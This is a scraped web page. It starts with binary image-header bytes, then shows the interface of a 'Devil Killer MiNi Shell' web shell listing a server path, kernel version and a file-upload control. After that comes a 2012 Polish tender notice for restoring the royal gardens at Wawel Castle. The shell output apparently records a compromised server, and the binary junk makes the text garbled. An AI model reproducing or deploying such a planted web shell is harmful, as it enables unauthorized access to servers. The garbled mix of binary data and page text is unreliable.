JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120517/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120517/160436-N-2012.html

<p class="kh_header"><b>Kraków: Rewaloryzacja ogrodów królewskich - II etap w zespole zabytkowym Zamku Królewskiego na Wawelu, Wawel 5, (A7) - sprawa nr: VII/ZKnW/12</b><br>
<b>Numer ogłoszenia: 160436 - 2012; data zamieszczenia: 17.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zamek Królewski na Wawelu - Państwowe Zbiory Sztuki , Wawel 5, 31-001 Kraków, woj. małopolskie, tel. 012 4225155, faks 012 4215177.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewaloryzacja ogrodów królewskich - II etap w zespole zabytkowym Zamku Królewskiego na Wawelu, Wawel 5, (A7) - sprawa nr: VII/ZKnW/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Roboty będą polegać na wykonaniu:
-Niezbędnych rozbiórek elementów murowanych i zastanych konstrukcji żelbetowych w wykopach
-Robót ziemnych z wymianą gruntów (w tym na przystosowane do potrzeb ogrodu) na pow. ~1060 m2
-Hydroizolacji poziomych nowych (pod ogrodem) i remoncie istniejących pow. ~1300m2
-Geomembrany przeciwdziałającej penetracji systemów korzeniowych drzew w sadzie - 230 m2
-Powierzchni brukowanych z wapienia jurajskiego - 167,2 m2
-Bruku z cegły ceramicznej 29x14x7 - 122,4 m2
-Różne nawierzchnie żwirowe oraz gruntowa - 133,7 m2, w tym zielona 20,5 m2
-Odwodnienia powierzchniowego 
-Konstrukcji żelbetonowych i betonowych schodów terenowych pow. - 4,2 m2
-fundamentowanie konstrukcji altan, ogrodzeń i wykonanie podziemnych komór pomiarowo sterujących nawadnianie
-Wykonanie i montaż obiektów małej architektury w kamieniu, w drewnie itp. m.in.: ławki kamienne , ława darniowa, 2x altana, bramki do sadów i winnic, ogrodzenie drewniane sadów i winnic, balustrada okalająca (budowlę), donice trejaże, podpory roślin, budka - klatka dla ptaków
-Instalacji nawadniania i odwadniania
- przyłącza  wody  z istniejącego wodociągu do komór pomiarowo  sterujących Kps 1  i  Kps 2.
- aranżacja  układu  instalacyjnego  w  komorach pomiarowo  sterujących,
- rozprowadzenie  instalacyjne  poszczególnych  systemów  nawadniania
1.	Linie nawadniające z emiterami co 40cm (2kpl) - 560mb
2.	Rurociągi zasilające linii zraszaczy jw. - 150mb
Zamawiający wymaga, aby okres gwarancji i rękojmi wynosił 5 lat licząc od bezusterkowego odbioru końcowego przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-8, 45.23.32.53-7, 45.11.20.00-5, 45.22.30.00-6, 45.22.35.00-1, 45.26.20.00-1, 45.26.25.12-3, 45.23.20.00-2, 45.23.00.00-8, 45.23.21.20-9, 45.23.24.52-5, 45.23.21.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 84.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający będzie żądał wniesienia wadium przed terminem składania ofert. Wysokość wadium ustala się na kwotę 20.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>WYKONAWCA MUSI WYKAZAĆ IŻ wykonał w okresie ostatnich pięciu lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: 1. co najmniej jedną robotę budowlaną polegającą na wykonaniu nawierzchni z materiałów tradycyjnych (kamień naturalny, cegła, drewno) i małej architektury w obiektach wpisanych do rejestru zabytków lub na terenach ochrony konserwatorskiej o wartości robót minimum 400.000,00 zł netto; oraz 2. co najmniej jeden system nawadniania na terenach zieleni, objętych ochroną konserwatorską o wartości co najmniej 40.000,00 zł netto; oraz 3. co najmniej 1 robotę polegającą na przygotowaniu podłoża dla zagospodarowania zieleni ogrodu o wartości co najmniej 40.000,00 zł netto; oraz udokumentuje że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Ocena spełniania tego warunku zostanie dokonana w oparciu o złożone na potwierdzenie wyżej wymienionego warunku przez Wykonawcę dokumenty oraz oświadczenia, zgodnie z zasadą: spełnia - nie spełnia. Przy ocenie spełniania nin. warunku przez wykonawców wspólnie ubiegających się o udzielenie zamówienia wielkości stanowiące o spełnieniu warunku będą zsumowane. Łączne nie spełnienie nin. warunku spowoduje wykluczenie wykonawcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>WYKONAWCA MUSI WYKAZAĆ IŻ; dysponuje: 1. osobą która będzie pełnić obowiązki kierownika budowy i posiada uprawnienia budowlane przewidziane Prawem Budowlanym w specjalności konstrukcyjno-budowlanej oraz uprawnienia do kierowania robotami w obiekcie zabytkowym (posiada zezwolenie wydane na podstawie § 19 rozporządzenia Ministra Kultury i Sztuki z dnia 24 sierpnia 1964 roku w sprawie zezwoleń na prowadzenie prac konserwatorskich przy zabytkach i archeologicznych prac wykopaliskowych (Dz. U. Nr 31, poz. 197) oraz (lub) § 17-19 rozporządzenia MKiS z dnia 11 stycznia 1994 roku o zasadach i trybie udzielania zezwoleń na prowadzenie prac konserwatorskich przy zabytkach oraz prac archeologicznych i wykopaliskowych, warunkach ich prowadzenia i kwalifikacjach osób, które mają prawo prowadzenia tej działalności (Dz. U. Nr 16 poz.55) lub dokumenty potwierdzające spełnienie warunku określonego w § 24 ust. 2 rozporządzenia MKiDN z dnia 27 lipca 2011 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U.2011.165, poz.987), a także jest wpisana na listę członków właściwej izby samorządu zawodowego; 2. dysponuje osobą, która będzie pełnić obowiązki kierownika robót branży sanitarnej posiadającą uprawnienia w branży instalacyjnej sanitarnej oraz uprawnienia do kierowania robotami w obiekcie zabytkowym (posiada zezwolenie wydane na podstawie § 19 rozporządzenia Ministra Kultury i Sztuki z dnia 24 sierpnia 1964 roku w sprawie zezwoleń na prowadzenie prac konserwatorskich przy zabytkach i archeologicznych prac wykopaliskowych (Dz. U. Nr 31, poz. 197) oraz (lub) § 17-19 rozporządzenia MKiS z dnia 11 stycznia 1994 roku o zasadach i trybie udzielania zezwoleń na prowadzenie prac konserwatorskich przy zabytkach oraz prac archeologicznych i wykopaliskowych, warunkach ich prowadzenia i kwalifikacjach osób, które mają prawo prowadzenia tej działalności (Dz. U. Nr 16 poz.55) lub dokumenty potwierdzające spełnienie warunku określonego w § 24 ust.2 rozporządzenia MKiDN z dnia 27 lipca 2011 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U.2011.165, poz.987), a także jest wpisana na listę członków właściwej izby samorządu zawodowego; 3. osobą uprawnioną do wykonania prac przy instalacjach elektrycznych posiadającą uprawnienia typu SEP - E. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 
Ocena spełniania tego warunku zostanie dokonana w oparciu o złożone na potwierdzenie wyżej wymienionego warunku przez Wykonawcę dokumenty oraz oświadczenia, zgodnie z zasadą: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się posiadaniem opłaconej polisy, a w przypadku jej braku, innego dokumentu ubezpieczenia potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej (w zakresie prowadzonej działalności, obejmującej roboty będące przedmiotem postępowania), o sumie ubezpieczenia nie mniejszej niż 100.000,00 zł. Ocena spełniania tego warunku zostanie dokonana w oparciu o złożone na potwierdzenie wyżej wymienionego warunku przez Wykonawcę dokumenty oraz oświadczenia, zgodnie z zasadą: spełnia - nie spełnia. Przy ocenie spełniania nin. warunku przez wykonawców wspólnie ubiegających się o udzielenie zamówienia wielkości stanowiące o spełnieniu warunku będą zsumowane. Łączne nie spełnienie nin. warunku spowoduje wykluczenie wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Pzp; przykładowa treść oświadczenia: Oświadczam, że wykonawca, którego reprezentuję spełnia warunki, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych; 
2. Wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, tj. 1. co najmniej jednej roboty budowlanej polegającej na wykonaniu nawierzchni z materiałów tradycyjnych (kamień naturalny, cegła, drewno) i małej architektury w obiektach wpisanych do rejestru zabytków lub na terenach ochrony konserwatorskiej o wartości tych robót minimum 400.000,00 zł netto; oraz 2. co najmniej jednego systemu nawadniania na terenach zieleni, objętych ochroną konserwatorską o wartości co najmniej 40.000,00 zł netto; oraz 3. co najmniej 1 roboty polegającej na przygotowaniu podłoża dla zagospodarowania zieleni ogrodu o wartości co najmniej 40.000,00 zł netto; wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania (z nazwą obiektu) oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone; 
3. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, tj. 3.1. Osoba, która będzie pełnić obowiązki kierownika budowy i posiada uprawnienia budowlane przewidziane Prawem Budowlanym w specjalności konstrukcyjno-budowlanej, oraz uprawnienia do kierowania robotami w obiekcie zabytkowym (posiada zezwolenie wydane na podstawie § 19 rozporządzenia Ministra Kultury i Sztuki z dnia 24 sierpnia 1964 roku w sprawie zezwoleń na prowadzenie prac konserwatorskich przy zabytkach i archeologicznych prac wykopaliskowych (Dz. U. Nr 31, poz. 197) oraz (lub) § 17-19 rozporządzenia MKiS z dnia 11 stycznia 1994 roku o zasadach i trybie udzielania zezwoleń na prowadzenie prac konserwatorskich przy zabytkach oraz prac archeologicznych i wykopaliskowych, warunkach ich prowadzenia i kwalifikacjach osób, które mają prawo prowadzenia tej działalności (Dz. U. Nr 16 poz.55) lub dokumenty potwierdzające spełnienie warunku określonego w § 24 ust.2 rozporządzenia MKiDN z dnia 27 lipca 2011 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U.2011.165, poz.987), a także jest wpisana na listę członków właściwej izby samorządu zawodowego;  3.2. osoba, która będzie pełnić obowiązki kierownika robót branży sanitarnej posiadającą uprawnienia w branży instalacyjnej sanitarnej oraz uprawnienia do kierowania robotami w obiekcie zabytkowym (posiada zezwolenie wydane na podstawie § 19 rozporządzenia Ministra Kultury i Sztuki z dnia 24 sierpnia 1964 roku w sprawie zezwoleń na prowadzenie prac konserwatorskich przy zabytkach i archeologicznych prac wykopaliskowych (Dz. U. Nr 31, poz. 197) oraz (lub) § 17-19 rozporządzenia MKiS z dnia 11 stycznia 1994 roku o zasadach i trybie udzielania zezwoleń na prowadzenie prac konserwatorskich przy zabytkach oraz prac archeologicznych i wykopaliskowych, warunkach ich prowadzenia i kwalifikacjach osób, które mają prawo prowadzenia tej działalności (Dz. U. Nr 16 poz.55) lub dokumenty potwierdzające spełnienie warunku określonego w § 24 ust.2 rozporządzenia MKiDN z dnia 27 lipca 2011 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U.2011.165, poz.987), a także jest wpisana na listę członków właściwej izby samorządu zawodowego;  3.3. osoba, która posiada uprawnienia do wykonania prac przy instalacjach elektrycznych posiadającą uprawnienia typu SEP - E.; wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności;
 4. Oświadczenie, że w/w osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają w/w wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
 5. Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (minimalna wartość polisy 100.000,00 zł,).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Do składania ofert zamawiający zaprosi nie więcej niż 5 wykonawców, którzy spełniają warunki udziału w postępowaniu. Jeżeli warunki te spełni więcej niż 5 wykonawców, zamawiający zaprosi tych, którzy otrzymali najwyższe oceny spełniania warunku opisanego w punkcie III.3.2) tj. tych pięciu którzy wykażą się:
największą wartością wykonanych robót: 1. za każdą tożsamą robotę o wartości co najmniej 20 000,00 zł netto, ponad jedną bezwzględnie wymaganą robotę budowlaną
polegającą na wykonaniu nawierzchni z materiałów tradycyjnych (kamień naturalny, cegła, drewno) i małej architektury w obiektach wpisanych do rejestru zabytków lub na terenach ochrony konserwatorskiej o wartości robót minimum 400.000,00 zł netto, wykonawca otrzyma 2 pkt.; 2. za każde 10 000,00 zł netto, ponad bezwzględnie wymagany co najmniej jeden system nawadniania na terenach zieleni, objętych ochroną konserwatorską o wartości co najmniej 40.000,00 zł netto, wykonawca otrzyma 1 pkt.; 3. za każde 10.000,00 zł netto ponad bezwzględnie wymaganą robotę polegającą na przygotowaniu podłoża dla zagospodarowania zieleni ogrodu o wartości co najmniej 40.000,00 zł netto, wykonawca otrzyma 1 pkt. W przypadku wspólnego ubiegania się o zamówienie kilku wykonawców, doświadczenie zostanie zsumowane</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty na warunkach określonych w specyfikacji istotnych warunków zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> NIE DOTYCZY<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wraz z zaproszeniem do składania ofert zamawiający przekaże wykonawcy specyfikację istotnych warunków zamówienia..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2012 godzina 12:00, miejsce: Wnioski o dopuszczenie do udziału w postępowaniu o udzielnie zamówienia (wraz z oświadczeniami i dokumentami) należy składać w siedzibie zamawiającego, Wawel bud. Nr 8, pokój 19 Kancelaria Ogólna..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Niniejsze zamówienie finansowane jest ze środków Narodowego Funduszu Rewaloryzacji Zabytków Krakowa. W związku ze sposobem finansowania prace muszą być zakończone najpóźniej w terminie do 30 listopada 2012 roku. 
Wykonawca winien złożyć wniosek o dopuszczenie do udziału w postępowaniu. Przykładowa treść wniosku: 
Zwracam się z wnioskiem o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego na: Rewaloryzacja ogrodów królewskich - II etap w zespole zabytkowym Zamku królewskiego na Wawelu, Wawel 5 (A7) - sprawa nr: VII/ZKnW/12. W załączeniu składam dokumenty potwierdzające spełnianie warunków udziału w postępowaniu. Wniosek musi być podpisany przez osoby upoważnione do reprezentowania wykonawcy. Wraz z wnioskiem wykonawca winien złożyć dokumenty, o których mowa w punkcie III.4 oraz III.6 ogłoszenia. Wszystkie dokumenty muszą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę upoważnioną do reprezentowania wykonawcy. Wniosek należy złożyć w zaklejonej kopercie opisanej następująco: wniosek o dopuszczenie do udziału w postępowaniu na: Rewaloryzacja ogrodów królewskich - II etap w zespole zabytkowym Zamku królewskiego na Wawelu, Wawel 5 (A7) - sprawa nr: VII/ZKnW/12. Termin składania wniosków: 23.05.2012 r., do godz. 12:00. Przetarg ograniczony to tryb udzielenia zamówienia, w którym, w odpowiedzi na ogłoszenie o zamówieniu, wykonawcy składają wnioski o dopuszczenie do udziału w przetargu ograniczonym w terminie określonym w niniejszym ogłoszeniu. Wraz z zaproszeniem do składania ofert zamawiający przekazuje wykonawcy specyfikację istotnych warunków zamówienia. Wnioski o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia wraz z załącznikami i dokumentami wymaganymi w ogłoszeniu, muszą być podpisane przez 
osoby uprawnione do reprezentowania wykonawcy. Wniosek pod rygorem nieważności musi być sporządzony w języku polskim, w formie pisemnej, czytelnie oraz podpisany przez osoby uprawnione do składania oświadczeń woli w imieniu wykonawcy. Informacja o złożeniu wniosku o dopuszczenie do udziału w postępowaniu może być przekazana telefonicznie przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu. Wniosek uważa się za złożony w terminie, jeżeli przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu został on wysłany w formie pisemnej i zamawiający otrzymał go nie później niż w terminie 7 dni od dnia upływu terminu składania wniosków. W przypadku złożenia wniosku o dopuszczenie do udziału w postępowaniu po terminie, zamawiający niezwłocznie zwróci wniosek. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, pod warunkiem, że taki wniosek będzie spełniać następujące wymagania: - Wykonawcy, występujący wspólnie, ustanawiają PEŁNOMOCNIKA do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia 